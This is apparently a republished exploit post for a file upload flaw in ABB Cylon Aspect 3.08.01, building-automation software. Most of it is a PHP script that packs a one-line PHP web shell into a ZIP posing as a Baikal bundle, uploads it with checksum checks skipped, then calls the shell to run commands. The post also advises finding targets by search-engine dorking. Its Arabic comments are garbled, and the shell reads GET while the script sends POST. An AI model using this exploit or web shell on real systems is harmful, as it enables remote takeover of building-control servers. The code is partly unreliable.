=============================================================================================================================================
| # Title : ABB Cylon =============================================================================================================================================
| # Title : ABB Cylon Aspect 3.08.01 shell upload |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://global.abb/group/en |
=============================================================================================================================================
POC :
[+] Dorking ?n Google Or Other Search Enggine.
[+] Code Description: Script to exploit file upload vulnerability in ABB Cylon Aspect 3.08.01 Allows you to upload a PHP file and execute it on the target server.
(Related : https://packetstorm.news/files/id/189617/ Related CVE numbers: ) .
[+] save code as poc.php.
[+] Usage : php poc.php
[+] PayLoad :
<?php
// ????? ???????? ???? ??? ??????? ?? ABB Cylon Aspect 3.08.01
// ???? ???? ??? PHP ??????? ??? ??????? ????????
$target_url = "http://192.168.73.31/caldavUpload.php";
$backdoor_path = "baikal/html/indoushka.php";
$zip_file = "baikal-0.6.1.zip";
// ????? ??? ??? ????
$backdoor = "<?php echo shell_exec(\$_GET['cmd']); ?>";
file_put_contents("indoushka.php", $backdoor);
// ??? ????? ??? ?? ??? ZIP
$zip = new ZipArchive();
if ($zip->open($zip_file, ZipArchive::CREATE) === TRUE) {
$zip->addFile("indoushka.php", $backdoor_path);
$zip->close();
echo "[+] ?? ????? ??? ZIP ????? ??? ????? ???.\n";
} else {
die("[-] ??? ?? ????? ??? ZIP.\n");
}
// ??? ????? ??? ???????
$post_data = [
'baikalFile' => new CURLFile($zip_file),
'skipChecksum' => '1',
'EXPERTMODE' => '1'
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
if (strpos($response, "Baikal Bundle Uploaded and Extracted - OK") !== false) {
echo "[+] ?? ??? ????? ??? ?????!\n";
} else {
die("[-] ??? ?? ??? ????? ???.\n");
}
// ????? ????? ?? ???? ????? ???
$backdoor_url = "http://192.168.73.31/baikal/html/indoushka.php";
$cmd = "id";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $backdoor_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, ['cmd' => $cmd]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
echo "[+] ??????? ????? ???:\n$response\n";
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
ABB Cylon Aspect 3.08.01 Shell Upload
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 133